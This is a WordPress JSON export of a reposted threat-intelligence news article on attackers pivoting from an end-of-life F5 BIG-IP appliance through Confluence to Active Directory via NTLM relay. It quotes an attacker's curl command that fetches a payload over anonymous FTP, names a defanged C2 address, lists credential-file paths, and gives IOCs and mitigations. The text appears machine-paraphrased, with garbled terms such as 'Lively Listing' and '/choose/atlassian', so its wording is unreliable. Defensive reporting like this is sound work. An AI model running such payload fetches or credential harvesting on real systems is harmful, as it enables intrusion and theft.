{"id":15064,"date":"2026-05-24T02:56:08","date_gmt":"2026-05-24T02:56:08","guid":{"rendered":"https:\/\/techtrendfeed.com\/?p=15064"},"modified":"2026-05-24T02:56:08","modified_gmt":"2026-05-24T02:56:08","slug":"hackers-exploit-f5-big-ip-to-acquire-ssh-entry-and-pivot-into-linux-networks","status":"publish","type":"post","link":"https:\/\/techtrendfeed.com\/?p=15064","title":{"rendered":"Hackers Exploit F5 BIG-IP to Acquire SSH Entry and Pivot Into Linux Networks"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p class=\"wp-block-paragraph\">Menace actors are actively exploiting end-of-life F5 BIG-IP home equipment to achieve unauthorized SSH entry into enterprise networks, utilizing the compromised units as launchpads for classy multi-stage intrusion campaigns that finally <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/gbhackers.com\/microsoft-active-directory-flaw\/\" target=\"_blank\" rel=\"noreferrer noopener\">goal Lively Listing infrastructure<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">Microsoft Menace Intelligence disclosed the complete assault chain on Could 22, 2026, documenting how a single compromised edge equipment cascaded into domain-level compromise spanning Linux hosts, an inner Atlassian Confluence server, and Home windows authentication methods.<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/05\/22\/from-edge-appliance-to-enterprise-compromise-multi-stage-linux-intrusion-via-f5-and-confluence\/\" target=\"_blank\" rel=\"noreferrer noopener\"\/><\/p>\n<p class=\"wp-block-paragraph\">Within the documented incident, investigators traced the menace actor\u2019s preliminary SSH entry to an Azure-hosted\u00a0F5 BIG-IP Digital Version (VE) working model 15.1.201000,\u00a0a cloud-deployed construct generally provisioned through Azure ARM templates and Terraform modules. <\/p>\n<p class=\"wp-block-paragraph\">This particular model reached\u00a0end-of-life (EOL) on December 31, 2024, leaving it unpatched and unsupported on the time of compromise.<\/p>\n<h2 id=\"h-f5-big-ip-to-gain-ssh-access\" class=\"wp-block-heading\"><strong>F5 BIG-IP to Acquire SSH Entry<\/strong><\/h2>\n<p class=\"wp-block-paragraph\">The timing aligns immediately with the broader F5 menace panorama. In\u00a0August 2025, a complicated nation-state menace actor breached F5\u2019s inner methods and exfiltrated BIG-IP product supply code together with particulars of undisclosed, unpatched vulnerabilities. <\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-105.webp\" alt=\"Attack Flow&#10;\"\/><figcaption class=\"wp-element-caption\">Assault Circulation  (Supply: Microsoft)<\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">That breach, publicly disclosed by F5 in October 2025, has been linked to the\u00a0BRICKSTORM malware household, which is related to campaigns concentrating on software program and cloud distributors to reap supply code and credentials for downstream provide chain exploitation.<\/p>\n<p class=\"wp-block-paragraph\">Compounding the chance,\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/gbhackers.com\/14000-f5-big-ip-apm-instances-exposed-online\/\" target=\"_blank\" rel=\"noreferrer noopener\">CVE-2025-53521,\u00a0a important flaw in F5 BIG-IP Entry Coverage Supervisor (APM)<\/a>, was initially disclosed in October 2025 as a denial-of-service bug. Nonetheless, it was reclassified in\u00a0March 2026\u00a0as a\u00a0distant code execution (RCE) vulnerability with a CVSS rating of 9.8. <\/p>\n<p class=\"wp-block-paragraph\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/gbhackers.com\/cisa-warns-of-actively-exploited-f5-big-ip-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">CISA added CVE-2025-53521 <\/a>to its Identified Exploited Vulnerabilities (KEV) catalog on March 27, 2026, with Shadowserver Basis reporting over\u00a017,000 susceptible IPs worldwide\u00a0on the time. The Dutch Nationwide Cyber Safety Heart additionally independently confirmed lively abuse of this vulnerability within the wild.<\/p>\n<p class=\"wp-block-paragraph\">As soon as SSH entry was established through the compromised F5 equipment, the menace actor authenticated utilizing a\u00a0privileged account with unrestricted sudo rights\u00a0and maintained hands-on keyboard entry all through your entire intrusion with out deploying specific persistence mechanisms.<\/p>\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/05\/image-106.webp\" alt=\"Threat actor activities\"\/><figcaption class=\"wp-element-caption\">Menace actor actions (Supply: Microsoft)<\/figcaption><\/figure>\n<p class=\"wp-block-paragraph\">The attacker instantly launched aggressive reconnaissance utilizing a layered toolkit:<\/p>\n<ul class=\"wp-block-list\">\n<li>Nmap\u00a0with automated shell scripts for horizontal and vertical community scanning throughout inner subnets<\/li>\n<li>GoWitness\u00a0to screenshot-capture all found HTTP\/HTTPS companies<\/li>\n<li>testssl\u00a0to probe SSL\/TLS weaknesses and establish potential protocol downgrade paths<\/li>\n<li>A customized ELF binary detected as\u00a0HackTool:Linux\/MalPack.B downloaded from\u00a0<code>206.189.27[.]39:8888<\/code>\u00a0through\u00a0<code>wget<\/code>\u00a0to enumerate net utility entry controls<\/li>\n<\/ul>\n<p class=\"wp-block-paragraph\">Makes an attempt to make use of commonplace NTLM-based lateral motion instruments, together with\u00a0<code>enum4linux<\/code>,\u00a0<code>kerbrute<\/code>,\u00a0<code>responder<\/code>,\u00a0<code>smbclient<\/code>, and\u00a0<code>netexec<\/code>\u00a0 in opposition to the Home windows infrastructure have been initially unsuccessful.<\/p>\n<p class=\"wp-block-paragraph\">Throughout reconnaissance, the menace actor recognized an internally hosted\u00a0Atlassian Confluence server\u00a0carrying unpatched distant code execution vulnerabilities.<\/p>\n<p class=\"wp-block-paragraph\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/05\/22\/from-edge-appliance-to-enterprise-compromise-multi-stage-linux-intrusion-via-f5-and-confluence\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Microsoft acknowledged that<\/a> the server was not internet-facing; it turned reachable solely after the attacker gained inner community entry, a key threat in hybrid and cloud environments the place implicit belief boundaries exist between companies.<\/p>\n<p class=\"wp-block-paragraph\">When real-time safety (RTP) on the Confluence host blocked direct payload supply, the menace actor tailored by standing up a Python FTP server on the preliminary Linux host to stage and switch the payload utilizing nameless FTP:<\/p>\n<pre class=\"wp-block-preformatted\">bash<code>curl -o \/dev\/shm\/ag ftp:\/\/nameless:nameless@[REDACTED_LOCAL_IP]\/5<\/code><\/pre>\n<p class=\"wp-block-paragraph\">After compromising Confluence, the attacker extracted credentials from\u00a0<code>\/choose\/atlassian\/confluence\/conf\/server.xml<\/code>\u00a0and\u00a0<code>confluence.cfg.xml<\/code>\u00a0and weaponized them for\u00a0Kerberos relay assaults\u00a0in opposition to the area infrastructure. <\/p>\n<p class=\"wp-block-paragraph\">This included exploitation of\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/gbhackers.com\/windows-smb-client-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">CVE-2025-33073, a Home windows SMB NTLM reflection<\/a> vulnerability disclosed in June 2025 by researchers at RedTeam Pentesting and Synacktiv. <\/p>\n<p class=\"wp-block-paragraph\">CVE-2025-33073 removes the prerequisite of admin entry to realize authenticated RCE as SYSTEM on any domain-joined machine with out SMB signing enforced, requiring solely community entry and any legitimate area credential.<\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<thead>\n<tr>\n<th class=\"has-text-align-left\" data-align=\"left\">Indicator<\/th>\n<th class=\"has-text-align-left\" data-align=\"left\">Sort<\/th>\n<th class=\"has-text-align-left\" data-align=\"left\">Description<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\"><code>4a927d031919fd6bd88d3c8a917214b54bca00f8ddc80ecfe4d230663dda7465<\/code><\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">SHA-256 File Hash<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Customized scanning software (HackTool:Linux\/MalPack.B)<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\"><code>b4592cea69699b2c0737d4e19cff7dca17b5baf5a238cd6da950a37e9986f216<\/code><\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">SHA-256 File Hash<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Shell script automating Nmap community scanning<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\"><code>710a9d2653c8bd3689e451778dab9daec0de4c4c75f900788ccf23ef254b122a<\/code><\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">SHA-256 File Hash<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">Kerbrute software (HackTool:Linux\/Kerbrute!rfn)<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\"><code>57b3188e24782c27fdf72493ce599537efd3187d03b80f8afe733c72d68c5517<\/code><\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">SHA-256 File Hash<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">gowitness HTTP\/HTTPS screenshot scanner<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\"><code>bdd5da81ac34d9faa2a5118d4ed8f492239734be02146cd24a0e34270a48a455<\/code><\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">SHA-256 File Hash<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">NTLM relay Python script (CVE-2025-33073 exploit)<\/td>\n<\/tr>\n<tr>\n<td class=\"has-text-align-left\" data-align=\"left\"><code>206.189.27[.]39<\/code><\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">IPv4 Handle (Defanged)<\/td>\n<td class=\"has-text-align-left\" data-align=\"left\">C2 server  payload supply on port 8888<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p class=\"wp-block-paragraph\"><strong>Word:<\/strong>\u00a0<em>IP addresses and domains are deliberately defanged (e.g.,\u00a0<\/em><code><em>[.]<\/em><\/code><em>) to stop unintended decision or hyperlinking. Re-fang solely inside managed menace intelligence platforms resembling MISP, VirusTotal, or your SIEM<\/em>.<\/p>\n<h2 id=\"h-mitigation\" class=\"wp-block-heading\"><strong>Mitigation<\/strong><\/h2>\n<ul class=\"wp-block-list\">\n<li>Retire EOL home equipment instantly deal with internet-facing edge units as Tier-0 belongings with strict lifecycle governance<\/li>\n<li>Patch inner purposes\u00a0like Confluence with the identical urgency as internet-exposed companies.<\/li>\n<li>Disable or decrease NTLM, implement SMB signing, and allow LDAP signing and channel binding to dam relay assaults<\/li>\n<li>Allow Microsoft Defender for Endpoint\u00a0in block mode constantly throughout all Linux servers.<\/li>\n<li>Implement a tiered administration mannequin\u00a0to stop single-application credential theft from reaching area controllers<\/li>\n<\/ul>\n<p class=\"has-text-align-center has-background wp-block-paragraph\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 87%,rgb(169,184,195) 100%)\"><code><strong>Comply with us on\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/news.google.com\/publications\/CAAqKAgKIiJDQklTRXdnTWFnOEtEV2RpYUdGamEyVnljeTVqYjIwb0FBUAE?hl=en-IN&amp;gl=IN&amp;ceid=IN%3Aen\" target=\"_blank\" rel=\"noreferrer noopener\">Google Information<\/a>,\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.linkedin.com\/company\/cyber-threat-intel\/\" target=\"_blank\" rel=\"noreferrer noopener\">LinkedIn<\/a>, and\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/x.com\/The_Cyber_News\" target=\"_blank\" rel=\"noreferrer noopener\">X<\/a>\u00a0to Get Prompt Updates and Set GBH as a Most well-liked Supply in\u00a0<a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.google.com\/preferences\/source?q=https:\/\/gbhackers.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">Google<\/a>.<\/strong><\/code><\/p>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>Menace actors are actively exploiting end-of-life F5 BIG-IP home equipment to achieve unauthorized SSH entry into enterprise networks, utilizing the compromised units as launchpads for classy multi-stage intrusion campaigns that finally goal Lively Listing infrastructure. Microsoft Menace Intelligence disclosed the complete assault chain on Could 22, 2026, documenting how a single compromised edge equipment cascaded [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":15066,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[539,9187,776,3054,554,2026,667,6917,5667],"class_list":["post-15064","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-access","tag-bigip","tag-exploit","tag-gain","tag-hackers","tag-linux","tag-networks","tag-pivot","tag-ssh"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/15064","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15064"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/15064\/revisions"}],"predecessor-version":[{"id":15065,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/15064\/revisions\/15065"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/15066"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15064"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15064"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15064"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<!-- This website is optimized by Airlift. Learn more: https://airlift.net. Template:. Learn more: https://airlift.net. Template: 69d9690a190636c2e0989534. Config Timestamp: 2026-04-10 21:18:02 UTC, Cached Timestamp: 2026-05-24 20:18:53 UTC -->